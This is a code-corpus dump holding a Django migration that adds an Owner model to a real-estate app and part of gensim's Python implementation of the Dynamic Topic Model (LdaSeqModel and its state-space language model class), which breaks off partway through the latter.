id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
3526244 | <reponame>Rostwik/real_estate_agency-master<gh_stars>0
# Generated by Django 2.2.24 on 2022-03-18 10:39
from django.db import migrations, models
import phonenumber_field.modelfields
class Migration(migrations.Migration):
    # Auto-generated Django migration (2.2.x): widens Flat.owner_pure_phone to a
    # PhoneNumberField and introduces a standalone Owner model linked to flats
    # via a many-to-many relation.

    dependencies = [
        ('property', '0009_auto_20220206_2022'),
    ]

    operations = [
        # Normalized owner phone stored on Flat itself; blank allowed so existing
        # rows without a parsed number remain valid.
        migrations.AlterField(
            model_name='flat',
            name='owner_pure_phone',
            field=phonenumber_field.modelfields.PhoneNumberField(blank=True, max_length=128, region=None, verbose_name='Нормализованный номер владельца'),
        ),
        # New Owner model: full name, raw phone string, and a normalized phone.
        migrations.CreateModel(
            name='Owner',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('owner', models.CharField(max_length=200, verbose_name='ФИО владельца')),
                ('owners_phonenumber', models.CharField(max_length=20, verbose_name='Номер владельца')),
                ('owner_pure_phone', phonenumber_field.modelfields.PhoneNumberField(blank=True, max_length=128, region=None, verbose_name='Нормализованный номер владельца')),
                # NOTE(review): the verbose_name ("Квартира, на которую пожаловались" —
                # "flat complained about") looks copy-pasted from a Complaint model;
                # it labels the owner's flats here. Confirm and fix in a follow-up
                # migration rather than editing this applied one.
                ('owner_apartments', models.ManyToManyField(related_name='owners', to='property.Flat', verbose_name='Квартира, на которую пожаловались')),
            ],
        ),
    ]
| StarcoderdataPython |
1822446 | <gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
# Based on Copyright (C) 2016 <NAME> <<EMAIL>>
"""Lda Sequence model, inspired by `<NAME>, <NAME>: "Dynamic Topic Models"
<https://mimno.infosci.cornell.edu/info6150/readings/dynamic_topic_models.pdf>`_ .
The original C/C++ implementation can be found on `blei-lab/dtm <https://github.com/blei-lab/dtm>`.
TODO: The next steps to take this forward would be:
#. Include DIM mode. Most of the infrastructure for this is in place.
#. See if LdaPost can be replaced by LdaModel completely without breaking anything.
#. Heavy lifting going on in the Sslm class - efforts can be made to cythonise mathematical methods, in particular,
update_obs and the optimization takes a lot time.
#. Try and make it distributed, especially around the E and M step.
#. Remove all C/C++ coding style/syntax.
Examples
--------
Set up a model using 9 documents, with 2 in the first time-slice, 4 in the second, and 3 in the third
>>> from gensim.test.utils import common_corpus
>>> from gensim.models import LdaSeqModel
>>>
>>> ldaseq = LdaSeqModel(corpus=common_corpus, time_slice=[2, 4, 3], num_topics=2, chunksize=1)
Persist a model to disk and reload it later
>>> from gensim.test.utils import datapath
>>>
>>> temp_file = datapath("model")
>>> ldaseq.save(temp_file)
>>>
>>> # Load a potentially pre-trained model from disk.
>>> ldaseq = LdaSeqModel.load(temp_file)
Access the document embeddings generated from the DTM
>>> doc = common_corpus[1]
>>>
>>> embedding = ldaseq[doc]
"""
from gensim import utils, matutils
from gensim.models import ldamodel
import numpy as np
from scipy.special import digamma, gammaln
from scipy import optimize
import logging
logger = logging.getLogger(__name__)
class LdaSeqModel(utils.SaveLoad):
    """Estimate Dynamic Topic Model parameters based on a training corpus."""

    def __init__(self, corpus=None, time_slice=None, id2word=None, alphas=0.01, num_topics=10,
                 initialize='gensim', sstats=None, lda_model=None, obs_variance=0.5, chain_variance=0.005, passes=10,
                 random_state=None, lda_inference_max_iter=25, em_min_iter=6, em_max_iter=20, chunksize=100):
        """
        Parameters
        ----------
        corpus : {iterable of list of (int, float), scipy.sparse.csc}, optional
            Stream of document vectors or sparse matrix of shape (`num_terms`, `num_documents`).
            If not given, the model is left untrained (presumably because you want to call
            :meth:`~gensim.models.ldamodel.LdaSeqModel.update` manually).
        time_slice : list of int, optional
            Number of documents in each time-slice. Each time slice could for example represent a year's published
            papers, in case the corpus comes from a journal publishing over multiple years.
            It is assumed that `sum(time_slice) == num_documents`.
        id2word : dict of (int, str), optional
            Mapping from word IDs to words. It is used to determine the vocabulary size, as well as for
            debugging and topic printing.
        alphas : float, optional
            The prior probability for the model.
        num_topics : int, optional
            The number of requested latent topics to be extracted from the training corpus.
        initialize : {'gensim', 'own', 'ldamodel'}, optional
            Controls the initialization of the DTM model. Supports three different modes:
                * 'gensim': Uses gensim's LDA initialization.
                * 'own': Uses your own initialization matrix of an LDA model that has been previously trained.
                * 'ldamodel': Use a previously trained LDA model, passing it through the `lda_model` argument.
        sstats : numpy.ndarray , optional
            Sufficient statistics used for initializing the model if `initialize == 'own'`. Corresponds to matrix
            beta in the linked paper for time slice 0, expected shape (`self.vocab_len`, `num_topics`).
        lda_model : :class:`~gensim.models.ldamodel.LdaModel`
            Model whose sufficient statistics will be used to initialize the current object
            if `initialize == 'ldamodel'`.
        obs_variance : float, optional
            Observed variance used to approximate the true and forward variance as shown in
            `<NAME>, <NAME>: "Dynamic Topic Models"
            <https://mimno.infosci.cornell.edu/info6150/readings/dynamic_topic_models.pdf>`_.
        chain_variance : float, optional
            Gaussian parameter defined in the beta distribution to dictate how the beta values evolve over time.
        passes : int, optional
            Number of passes over the corpus for the initial :class:`~gensim.models.ldamodel.LdaModel`
        random_state : {numpy.random.RandomState, int}, optional
            Can be a np.random.RandomState object, or the seed to generate one. Used for reproducibility of results.
        lda_inference_max_iter : int, optional
            Maximum number of iterations in the inference step of the LDA training.
        em_min_iter : int, optional
            Minimum number of iterations until converge of the Expectation-Maximization algorithm
        em_max_iter : int, optional
            Maximum number of iterations until converge of the Expectation-Maximization algorithm.
        chunksize : int, optional
            Number of documents in the corpus to be processed in a chunk.
        """
        self.id2word = id2word
        if corpus is None and self.id2word is None:
            raise ValueError(
                'at least one of corpus/id2word must be specified, to establish input space dimensionality'
            )

        if self.id2word is None:
            logger.warning("no word id mapping provided; initializing from corpus, assuming identity")
            self.id2word = utils.dict_from_corpus(corpus)
            self.vocab_len = len(self.id2word)
        elif len(self.id2word) > 0:
            self.vocab_len = len(self.id2word)
        else:
            self.vocab_len = 0

        if corpus is not None:
            try:
                # NOTE(review): if `corpus` is a one-shot generator, len() raises and the
                # fallback below exhausts it; the loop computing max_doc_len would then see
                # nothing. Callers should pass a re-iterable corpus — confirm upstream.
                self.corpus_len = len(corpus)
            except TypeError:
                logger.warning("input corpus stream has no len(); counting documents")
                self.corpus_len = sum(1 for _ in corpus)

        self.time_slice = time_slice
        if self.time_slice is not None:
            self.num_time_slices = len(time_slice)

        # Longest document (by number of unique terms) — sizes LdaPost buffers.
        max_doc_len = 0
        for line_no, line in enumerate(corpus):
            if len(line) > max_doc_len:
                max_doc_len = len(line)
        self.max_doc_len = max_doc_len

        self.num_topics = num_topics
        self.num_time_slices = len(time_slice)
        self.alphas = np.full(num_topics, alphas)

        # topic_chains contains for each topic a 'state space language model' object
        # which in turn has information about each topic
        # the sslm class is described below and contains information
        # on topic-word probabilities and doc-topic probabilities.
        self.topic_chains = []
        for topic in range(0, num_topics):
            sslm_ = sslm(
                num_time_slices=self.num_time_slices, vocab_len=self.vocab_len, num_topics=self.num_topics,
                chain_variance=chain_variance, obs_variance=obs_variance
            )
            self.topic_chains.append(sslm_)

        # the following are class variables which are to be integrated during Document Influence Model
        self.top_doc_phis = None
        self.influence = None
        self.renormalized_influence = None
        self.influence_sum_lgl = None

        # if a corpus and time_slice is provided, depending on the user choice of initializing LDA, we start DTM.
        if corpus is not None and time_slice is not None:
            if initialize == 'gensim':
                lda_model = ldamodel.LdaModel(
                    corpus, id2word=self.id2word, num_topics=self.num_topics,
                    passes=passes, alpha=self.alphas, random_state=random_state,
                    dtype=np.float64
                )
                self.sstats = np.transpose(lda_model.state.sstats)
            if initialize == 'ldamodel':
                self.sstats = np.transpose(lda_model.state.sstats)
            if initialize == 'own':
                self.sstats = sstats

            # initialize model from sstats
            self.init_ldaseq_ss(chain_variance, obs_variance, self.alphas, self.sstats)

            # fit DTM
            self.fit_lda_seq(corpus, lda_inference_max_iter, em_min_iter, em_max_iter, chunksize)

    def init_ldaseq_ss(self, topic_chain_variance, topic_obs_variance, alpha, init_suffstats):
        """Initialize State Space Language Model, topic-wise.

        Parameters
        ----------
        topic_chain_variance : float
            Gaussian parameter defined in the beta distribution to dictate how the beta values evolve.
        topic_obs_variance : float
            Observed variance used to approximate the true and forward variance as shown in
            `<NAME>, <NAME>: "Dynamic Topic Models"
            <https://mimno.infosci.cornell.edu/info6150/readings/dynamic_topic_models.pdf>`_.
        alpha : float
            The prior probability for the model.
        init_suffstats : numpy.ndarray
            Sufficient statistics used for initializing the model, expected shape (`self.vocab_len`, `num_topics`).
        """
        self.alphas = alpha
        for k, chain in enumerate(self.topic_chains):
            # each chain is seeded from column k of the LDA sufficient statistics
            sstats = init_suffstats[:, k]
            sslm.sslm_counts_init(chain, topic_obs_variance, topic_chain_variance, sstats)

            # initialize the below matrices only if running DIM
            # ldaseq.topic_chains[k].w_phi_l = np.zeros((ldaseq.vocab_len, ldaseq.num_time_slices))
            # ldaseq.topic_chains[k].w_phi_sum = np.zeros((ldaseq.vocab_len, ldaseq.num_time_slices))
            # ldaseq.topic_chains[k].w_phi_sq = np.zeros((ldaseq.vocab_len, ldaseq.num_time_slices))

    def fit_lda_seq(self, corpus, lda_inference_max_iter, em_min_iter, em_max_iter, chunksize):
        """Fit a LDA Sequence model (DTM).

        This method will iteratively setup LDA models and perform EM steps until the sufficient statistics convergence,
        or until the maximum number of iterations is reached. Because the true posterior is intractable, an
        appropriately tight lower bound must be used instead. This function will optimize this bound, by minimizing
        its true Kullback-Leibler Divergence with the true posterior.

        Parameters
        ----------
        corpus : {iterable of list of (int, float), scipy.sparse.csc}
            Stream of document vectors or sparse matrix of shape (`num_terms`, `num_documents`).
        lda_inference_max_iter : int
            Maximum number of iterations for the inference step of LDA.
        em_min_iter : int
            Minimum number of time slices to be inspected.
        em_max_iter : int
            Maximum number of time slices to be inspected.
        chunksize : int
            Number of documents to be processed in each chunk.

        Returns
        -------
        float
            The highest lower bound for the true posterior produced after all iterations.
        """
        LDASQE_EM_THRESHOLD = 1e-4
        # if bound is low, then we increase iterations.
        LOWER_ITER = 10
        ITER_MULT_LOW = 2
        MAX_ITER = 500

        num_topics = self.num_topics
        vocab_len = self.vocab_len
        data_len = self.num_time_slices
        corpus_len = self.corpus_len

        bound = 0
        convergence = LDASQE_EM_THRESHOLD + 1
        iter_ = 0

        # run at least em_min_iter EM iterations, then keep going until the
        # relative bound change drops below the threshold (or em_max_iter hits).
        while iter_ < em_min_iter or ((convergence > LDASQE_EM_THRESHOLD) and iter_ <= em_max_iter):

            logger.info(" EM iter %i", iter_)
            logger.info("E Step")
            # TODO: bound is initialized to 0
            old_bound = bound

            # initiate sufficient statistics
            topic_suffstats = []
            for topic in range(0, num_topics):
                topic_suffstats.append(np.resize(np.zeros(vocab_len * data_len), (vocab_len, data_len)))

            # set up variables
            gammas = np.resize(np.zeros(corpus_len * num_topics), (corpus_len, num_topics))
            lhoods = np.resize(np.zeros(corpus_len * num_topics + 1), (corpus_len, num_topics + 1))
            # compute the likelihood of a sequential corpus under an LDA
            # seq model and find the evidence lower bound. This is the E - Step
            bound, gammas = \
                self.lda_seq_infer(corpus, topic_suffstats, gammas, lhoods, iter_, lda_inference_max_iter, chunksize)
            self.gammas = gammas

            logger.info("M Step")

            # fit the variational distribution. This is the M - Step
            topic_bound = self.fit_lda_seq_topics(topic_suffstats)
            bound += topic_bound

            if (bound - old_bound) < 0:
                # if max_iter is too low, increase iterations.
                if lda_inference_max_iter < LOWER_ITER:
                    lda_inference_max_iter *= ITER_MULT_LOW
                logger.info("Bound went down, increasing iterations to %i", lda_inference_max_iter)

            # check for convergence
            convergence = np.fabs((bound - old_bound) / old_bound)

            if convergence < LDASQE_EM_THRESHOLD:
                # converged: allow one final pass with a much larger inference budget
                lda_inference_max_iter = MAX_ITER
                logger.info("Starting final iterations, max iter is %i", lda_inference_max_iter)
                convergence = 1.0

            logger.info("iteration %i iteration lda seq bound is %f convergence is %f", iter_, bound, convergence)

            iter_ += 1

        return bound

    def lda_seq_infer(self, corpus, topic_suffstats, gammas, lhoods,
                      iter_, lda_inference_max_iter, chunksize):
        """Inference (or E-step) for the lower bound EM optimization.

        This is used to set up the gensim :class:`~gensim.models.ldamodel.LdaModel` to be used for each time-slice.
        It also allows for Document Influence Model code to be written in.

        Parameters
        ----------
        corpus : {iterable of list of (int, float), scipy.sparse.csc}
            Stream of document vectors or sparse matrix of shape (`num_terms`, `num_documents`).
        topic_suffstats : numpy.ndarray
            Sufficient statistics for time slice 0, used for initializing the model if `initialize == 'own'`,
            expected shape (`self.vocab_len`, `num_topics`).
        gammas : numpy.ndarray
            Topic weight variational parameters for each document. If not supplied, it will be inferred from the model.
        lhoods : list of float
            The total log probability lower bound for each topic. Corresponds to the phi variational parameters in the
            linked paper.
        iter_ : int
            Current iteration.
        lda_inference_max_iter : int
            Maximum number of iterations for the inference step of LDA.
        chunksize : int
            Number of documents to be processed in each chunk.

        Returns
        -------
        (float, list of float)
            The first value is the highest lower bound for the true posterior.
            The second value is the list of optimized dirichlet variational parameters for the approximation of
            the posterior.
        """
        num_topics = self.num_topics
        vocab_len = self.vocab_len
        bound = 0.0

        lda = ldamodel.LdaModel(num_topics=num_topics, alpha=self.alphas, id2word=self.id2word, dtype=np.float64)
        lda.topics = np.array(np.split(np.zeros(vocab_len * num_topics), vocab_len))
        ldapost = LdaPost(max_doc_len=self.max_doc_len, num_topics=num_topics, lda=lda)

        # DIM mode is not implemented yet; only the DTM branch runs.
        model = "DTM"
        if model == "DTM":
            bound, gammas = self.inferDTMseq(
                corpus, topic_suffstats, gammas, lhoods, lda,
                ldapost, iter_, bound, lda_inference_max_iter, chunksize
            )
        elif model == "DIM":
            self.InfluenceTotalFixed(corpus)
            bound, gammas = self.inferDIMseq(
                corpus, topic_suffstats, gammas, lhoods, lda,
                ldapost, iter_, bound, lda_inference_max_iter, chunksize
            )

        return bound, gammas

    def inferDTMseq(self, corpus, topic_suffstats, gammas, lhoods, lda,
                    ldapost, iter_, bound, lda_inference_max_iter, chunksize):
        """Compute the likelihood of a sequential corpus under an LDA seq model, and reports the likelihood bound.

        Parameters
        ----------
        corpus : {iterable of list of (int, float), scipy.sparse.csc}
            Stream of document vectors or sparse matrix of shape (`num_terms`, `num_documents`).
        topic_suffstats : numpy.ndarray
            Sufficient statistics of the current model, expected shape (`self.vocab_len`, `num_topics`).
        gammas : numpy.ndarray
            Topic weight variational parameters for each document. If not supplied, it will be inferred from the model.
        lhoods : list of float of length `self.num_topics`
            The total log probability bound for each topic. Corresponds to phi from the linked paper.
        lda : :class:`~gensim.models.ldamodel.LdaModel`
            The trained LDA model of the previous iteration.
        ldapost : :class:`~gensim.models.ldaseqmodel.LdaPost`
            Posterior probability variables for the given LDA model. This will be used as the true (but intractable)
            posterior.
        iter_ : int
            The current iteration.
        bound : float
            The LDA bound produced after all iterations.
        lda_inference_max_iter : int
            Maximum number of iterations for the inference step of LDA.
        chunksize : int
            Number of documents to be processed in each chunk.

        Returns
        -------
        (float, list of float)
            The first value is the highest lower bound for the true posterior.
            The second value is the list of optimized dirichlet variational parameters for the approximation of
            the posterior.
        """
        doc_index = 0  # overall doc_index in corpus
        time = 0  # current time-slice
        doc_num = 0  # doc-index in current time-slice
        lda = self.make_lda_seq_slice(lda, time)  # create lda_seq slice

        time_slice = np.cumsum(np.array(self.time_slice))

        for chunk_no, chunk in enumerate(utils.grouper(corpus, chunksize)):
            # iterates chunk size for constant memory footprint
            for doc in chunk:
                # this is used to update the time_slice and create a new lda_seq slice every new time_slice
                # NOTE(review): `>` looks off by one — with cumsum boundaries the first
                # document of a new slice (doc_index == time_slice[time]) is still scored
                # against the previous slice. This matches the original DTM port; confirm
                # before changing, as it alters trained models.
                if doc_index > time_slice[time]:
                    time += 1
                    lda = self.make_lda_seq_slice(lda, time)  # create lda_seq slice
                    doc_num = 0

                gam = gammas[doc_index]
                lhood = lhoods[doc_index]

                ldapost.gamma = gam
                ldapost.lhood = lhood
                ldapost.doc = doc

                # TODO: replace fit_lda_post with appropriate ldamodel functions, if possible.
                if iter_ == 0:
                    doc_lhood = LdaPost.fit_lda_post(
                        ldapost, doc_num, time, None, lda_inference_max_iter=lda_inference_max_iter
                    )
                else:
                    doc_lhood = LdaPost.fit_lda_post(
                        ldapost, doc_num, time, self, lda_inference_max_iter=lda_inference_max_iter
                    )

                if topic_suffstats is not None:
                    topic_suffstats = LdaPost.update_lda_seq_ss(ldapost, time, doc, topic_suffstats)

                gammas[doc_index] = ldapost.gamma
                bound += doc_lhood
                doc_index += 1
                doc_num += 1

        return bound, gammas

    def make_lda_seq_slice(self, lda, time):
        """Update the LDA model topic-word values using time slices.

        Parameters
        ----------
        lda : :class:`~gensim.models.ldamodel.LdaModel`
            The stationary model to be updated
        time : int
            The time slice assigned to the stationary model.

        Returns
        -------
        lda : :class:`~gensim.models.ldamodel.LdaModel`
            The stationary model updated to reflect the passed time slice.
        """
        for k in range(0, self.num_topics):
            lda.topics[:, k] = np.copy(self.topic_chains[k].e_log_prob[:, time])

        lda.alpha = np.copy(self.alphas)
        return lda

    def fit_lda_seq_topics(self, topic_suffstats):
        """Fit the sequential model topic-wise.

        Parameters
        ----------
        topic_suffstats : numpy.ndarray
            Sufficient statistics of the current model, expected shape (`self.vocab_len`, `num_topics`).

        Returns
        -------
        float
            The sum of the optimized lower bounds for all topics.
        """
        lhood = 0

        for k, chain in enumerate(self.topic_chains):
            logger.info("Fitting topic number %i", k)
            lhood_term = sslm.fit_sslm(chain, topic_suffstats[k])
            lhood += lhood_term

        return lhood

    def print_topic_times(self, topic, top_terms=20):
        """Get the most relevant words for a topic, for each timeslice. This can be used to inspect the evolution of a
        topic through time.

        Parameters
        ----------
        topic : int
            The index of the topic.
        top_terms : int, optional
            Number of most relevant words associated with the topic to be returned.

        Returns
        -------
        list of list of str
            Top `top_terms` relevant terms for the topic for each time slice.
        """
        topics = []
        for time in range(0, self.num_time_slices):
            topics.append(self.print_topic(topic, time, top_terms))

        return topics

    def print_topics(self, time=0, top_terms=20):
        """Get the most relevant words for every topic.

        Parameters
        ----------
        time : int, optional
            The time slice in which we are interested in (since topics evolve over time, it is expected that the most
            relevant words will also gradually change).
        top_terms : int, optional
            Number of most relevant words to be returned for each topic.

        Returns
        -------
        list of list of (str, float)
            Representation of all topics. Each of them is represented by a list of pairs of words and their assigned
            probability.
        """
        return [self.print_topic(topic, time, top_terms) for topic in range(0, self.num_topics)]

    def print_topic(self, topic, time=0, top_terms=20):
        """Get the list of words most relevant to the given topic.

        Parameters
        ----------
        topic : int
            The index of the topic to be inspected.
        time : int, optional
            The time slice in which we are interested in (since topics evolve over time, it is expected that the most
            relevant words will also gradually change).
        top_terms : int, optional
            Number of words associated with the topic to be returned.

        Returns
        -------
        list of (str, float)
            The representation of this topic. Each element in the list includes the word itself, along with the
            probability assigned to it by the topic.
        """
        # e_log_prob is (vocab, time); exponentiate and renormalize the requested slice.
        topic = self.topic_chains[topic].e_log_prob
        topic = np.transpose(topic)
        topic = np.exp(topic[time])
        topic = topic / topic.sum()
        bestn = matutils.argsort(topic, top_terms, reverse=True)
        beststr = [(self.id2word[id_], topic[id_]) for id_ in bestn]
        return beststr

    def doc_topics(self, doc_number):
        """Get the topic mixture for a document.

        Uses the priors for the dirichlet distribution that approximates the true posterior with the optimal
        lower bound, and therefore requires the model to be already trained.

        Parameters
        ----------
        doc_number : int
            Index of the document for which the mixture is returned.

        Returns
        -------
        list of length `self.num_topics`
            Probability for each topic in the mixture (essentially a point in the `self.num_topics - 1` simplex).
        """
        doc_topic = np.copy(self.gammas)
        doc_topic /= doc_topic.sum(axis=1)[:, np.newaxis]
        return doc_topic[doc_number]

    def dtm_vis(self, time, corpus):
        """Get the information needed to visualize the corpus model at a given time slice, using the pyLDAvis format.

        Parameters
        ----------
        time : int
            The time slice we are interested in.
        corpus : {iterable of list of (int, float), scipy.sparse.csc}, optional
            The corpus we want to visualize at the given time slice.

        Returns
        -------
        doc_topics : list of length `self.num_topics`
            Probability for each topic in the mixture (essentially a point in the `self.num_topics - 1` simplex).
        topic_term : numpy.ndarray
            The representation of each topic as a multinomial over words in the vocabulary,
            expected shape (`num_topics`, vocabulary length).
        doc_lengths : list of int
            The number of words in each document. These could be fixed, or drawn from a Poisson distribution.
        term_frequency : numpy.ndarray
            The term frequency matrix (denoted as beta in the original Blei paper). This could also be the TF-IDF
            representation of the corpus, expected shape (number of documents, length of vocabulary).
        vocab : list of str
            The set of unique terms existing in the corpus's vocabulary.
        """
        doc_topic = np.copy(self.gammas)
        doc_topic /= doc_topic.sum(axis=1)[:, np.newaxis]

        topic_term = [
            np.exp(np.transpose(chain.e_log_prob)[time]) / np.exp(np.transpose(chain.e_log_prob)[time]).sum()
            for k, chain in enumerate(self.topic_chains)
        ]

        # NOTE(review): `corpus` is iterated twice below; a one-shot generator would be
        # exhausted after the first pass — pass a re-iterable corpus.
        doc_lengths = [len(doc) for doc_no, doc in enumerate(corpus)]

        term_frequency = np.zeros(self.vocab_len)
        for doc_no, doc in enumerate(corpus):
            for pair in doc:
                term_frequency[pair[0]] += pair[1]

        vocab = [self.id2word[i] for i in range(0, len(self.id2word))]

        return doc_topic, np.array(topic_term), doc_lengths, term_frequency, vocab

    def dtm_coherence(self, time):
        """Get the coherence for each topic.

        Can be used to measure the quality of the model, or to inspect the convergence through training via a callback.

        Parameters
        ----------
        time : int
            The time slice.

        Returns
        -------
        list of list of str
            The word representation for each topic, for each time slice. This can be used to check the time coherence
            of topics as time evolves: If the most relevant words remain the same then the topic has somehow
            converged or is relatively static, if they change rapidly the topic is evolving.
        """
        coherence_topics = []
        for topics in self.print_topics(time):
            coherence_topic = []
            for word, dist in topics:
                coherence_topic.append(word)
            coherence_topics.append(coherence_topic)

        return coherence_topics

    def __getitem__(self, doc):
        """Get the topic mixture for the given document, using the inferred approximation of the true posterior.

        Parameters
        ----------
        doc : list of (int, float)
            The doc in BOW format. Can be an unseen document.

        Returns
        -------
        list of float
            Probabilities for each topic in the mixture. This is essentially a point in the `num_topics - 1` simplex.
        """
        lda_model = \
            ldamodel.LdaModel(num_topics=self.num_topics, alpha=self.alphas, id2word=self.id2word, dtype=np.float64)
        lda_model.topics = np.array(np.split(np.zeros(self.vocab_len * self.num_topics), self.vocab_len))
        ldapost = LdaPost(num_topics=self.num_topics, max_doc_len=len(doc), lda=lda_model, doc=doc)

        time_lhoods = []
        for time in range(0, self.num_time_slices):
            lda_model = self.make_lda_seq_slice(lda_model, time)  # create lda_seq slice
            lhood = LdaPost.fit_lda_post(ldapost, 0, time, self)
            time_lhoods.append(lhood)

        doc_topic = ldapost.gamma / ldapost.gamma.sum()
        # should even the likelihoods be returned?
        return doc_topic
class sslm(utils.SaveLoad):
"""Encapsulate the inner State Space Language Model for DTM.
Some important attributes of this class:
* `obs` is a matrix containing the document to topic ratios.
* `e_log_prob` is a matrix containing the topic to word ratios.
* `mean` contains the mean values to be used for inference for each word for a time slice.
* `variance` contains the variance values to be used for inference of word in a time slice.
    * `fwd_mean` and `fwd_variance` are the forward posterior values for the mean and the variance.
* `zeta` is an extra variational parameter with a value for each time slice.
"""
def __init__(self, vocab_len=None, num_time_slices=None, num_topics=None, obs_variance=0.5, chain_variance=0.005):
self.vocab_len = vocab_len
self.num_time_slices = num_time_slices
self.obs_variance = obs_variance
self.chain_variance = chain_variance
self.num_topics = num_topics
# setting up matrices
self.obs = np.array(np.split(np.zeros(num_time_slices * vocab_len), vocab_len))
self.e_log_prob = np.array(np.split(np.zeros(num_time_slices * vocab_len), vocab_len))
self.mean = np.array(np.split(np.zeros((num_time_slices + 1) * vocab_len), vocab_len))
self.fwd_mean = np.array(np.split(np.zeros((num_time_slices + 1) * vocab_len), vocab_len))
self.fwd_variance = np.array(np.split(np.zeros((num_time_slices + 1) * vocab_len), vocab_len))
self.variance = np.array(np.split(np.zeros((num_time_slices + 1) * vocab_len), vocab_len))
self.zeta = np.zeros(num_time_slices)
# the following are class variables which are to be integrated during Document Influence Model
self.m_update_coeff = None
self.mean_t = None
self.variance_t = None
self.influence_sum_lgl = None
self.w_phi_l = None
self.w_phi_sum = None
self.w_phi_l_sq = None
self.m_update_coeff_g = None
def update_zeta(self):
"""Update the Zeta variational parameter.
Zeta is described in the appendix and is equal to sum (exp(mean[word] + Variance[word] / 2)),
over every time-slice. It is the value of variational parameter zeta which maximizes the lower bound.
Returns
-------
list of float
The updated zeta values for each time slice.
"""
for j, val in enumerate(self.zeta):
self.zeta[j] = np.sum(np.exp(self.mean[:, j + 1] + self.variance[:, j + 1] / 2))
return self.zeta
def compute_post_variance(self, word, chain_variance):
"""Get the variance, based on the `Variational Kalman Filtering approach for Approximate Inference (section 3.1)
<https://mimno.infosci.cornell.edu/info6150/readings/dynamic_topic_models.pdf>`_.
This function accepts the word to compute variance for, along with the associated sslm class object,
and returns the `variance` and the posterior approximation `fwd_variance`.
Notes
-----
This function essentially computes Var[\beta_{t,w}] for t = 1:T
.. :math::
fwd\_variance[t] \equiv E((beta_{t,w}-mean_{t,w})^2 |beta_{t}\ for\ 1:t) =
(obs\_variance / fwd\_variance[t - 1] + chain\_variance + obs\_variance ) *
(fwd\_variance[t - 1] + obs\_variance)
.. :math::
variance[t] \equiv E((beta_{t,w}-mean\_cap_{t,w})^2 |beta\_cap_{t}\ for\ 1:t) =
fwd\_variance[t - 1] + (fwd\_variance[t - 1] / fwd\_variance[t - 1] + obs\_variance)^2 *
(variance[t - 1] - (fwd\_variance[t-1] + obs\_variance))
Parameters
----------
word: int
The word's ID.
chain_variance : float
Gaussian parameter defined in the beta distribution to dictate how the beta values evolve over time.
Returns
-------
(numpy.ndarray, numpy.ndarray)
The first returned value is the variance of each word in each time slice, the second value is the
inferred posterior variance for the same pairs.
"""
INIT_VARIANCE_CONST = 1000
T = self.num_time_slices
variance = self.variance[word]
fwd_variance = self.fwd_variance[word]
# forward pass. Set initial variance very high
fwd_variance[0] = chain_variance * INIT_VARIANCE_CONST
for t in range(1, T + 1):
if self.obs_variance:
c = self.obs_variance / (fwd_variance[t - 1] + chain_variance + self.obs_variance)
else:
c = 0
fwd_variance[t] = c * (fwd_variance[t - 1] + chain_variance)
# backward pass
variance[T] = fwd_variance[T]
for t in range(T - 1, -1, -1):
if fwd_variance[t] > 0.0:
c = np.power((fwd_variance[t] / (fwd_variance[t] + chain_variance)), 2)
else:
c = 0
variance[t] = (c * (variance[t + 1] - chain_variance)) + ((1 - c) * fwd_variance[t])
return variance, fwd_variance
def compute_post_mean(self, word, chain_variance):
"""Get the mean, based on the `Variational Kalman Filtering approach for Approximate Inference (section 3.1)
<https://mimno.infosci.cornell.edu/info6150/readings/dynamic_topic_models.pdf>`_.
Notes
-----
This function essentially computes E[\beta_{t,w}] for t = 1:T.
.. :math::
Fwd_Mean(t) ≡ E(beta_{t,w} | beta_ˆ 1:t )
= (obs_variance / fwd_variance[t - 1] + chain_variance + obs_variance ) * fwd_mean[t - 1] +
(1 - (obs_variance / fwd_variance[t - 1] + chain_variance + obs_variance)) * beta
.. :math::
Mean(t) ≡ E(beta_{t,w} | beta_ˆ 1:T )
= fwd_mean[t - 1] + (obs_variance / fwd_variance[t - 1] + obs_variance) +
(1 - obs_variance / fwd_variance[t - 1] + obs_variance)) * mean[t]
Parameters
----------
word: int
The word's ID.
chain_variance : float
Gaussian parameter defined in the beta distribution to dictate how the beta values evolve over time.
Returns
-------
(numpy.ndarray, numpy.ndarray)
The first returned value is the mean of each word in each time slice, the second value is the
inferred posterior mean for the same pairs.
"""
T = self.num_time_slices
obs = self.obs[word]
fwd_variance = self.fwd_variance[word]
mean = self.mean[word]
fwd_mean = self.fwd_mean[word]
# forward
fwd_mean[0] = 0
for t in range(1, T + 1):
c = self.obs_variance / (fwd_variance[t - 1] + chain_variance + self.obs_variance)
fwd_mean[t] = c * fwd_mean[t - 1] + (1 - c) * obs[t - 1]
# backward pass
mean[T] = fwd_mean[T]
for t in range(T - 1, -1, -1):
if chain_variance == 0.0:
c = 0.0
else:
c = chain_variance / (fwd_variance[t] + chain_variance)
mean[t] = c * fwd_mean[t] + (1 - c) * mean[t + 1]
return mean, fwd_mean
def compute_expected_log_prob(self):
"""Compute the expected log probability given values of m.
The appendix describes the Expectation of log-probabilities in equation 5 of the DTM paper;
The below implementation is the result of solving the equation and is implemented as in the original
Blei DTM code.
Returns
-------
numpy.ndarray of float
The expected value for the log probabilities for each word and time slice.
"""
for (w, t), val in np.ndenumerate(self.e_log_prob):
self.e_log_prob[w][t] = self.mean[w][t + 1] - np.log(self.zeta[t])
return self.e_log_prob
def sslm_counts_init(self, obs_variance, chain_variance, sstats):
"""Initialize the State Space Language Model with LDA sufficient statistics.
Called for each topic-chain and initializes initial mean, variance and Topic-Word probabilities
for the first time-slice.
Parameters
----------
obs_variance : float, optional
Observed variance used to approximate the true and forward variance.
chain_variance : float
Gaussian parameter defined in the beta distribution to dictate how the beta values evolve over time.
sstats : numpy.ndarray
Sufficient statistics of the LDA model. Corresponds to matrix beta in the linked paper for time slice 0,
expected shape (`self.vocab_len`, `num_topics`).
"""
W = self.vocab_len
T = self.num_time_slices
log_norm_counts = np.copy(sstats)
log_norm_counts = log_norm_counts / sum(log_norm_counts)
log_norm_counts = log_norm_counts + 1.0 / W
log_norm_counts = log_norm_counts / sum(log_norm_counts)
log_norm_counts = np.log(log_norm_counts)
# setting variational observations to transformed counts
self.obs = (np.repeat(log_norm_counts, T, axis=0)).reshape(W, T)
# set variational parameters
self.obs_variance = obs_variance
self.chain_variance = chain_variance
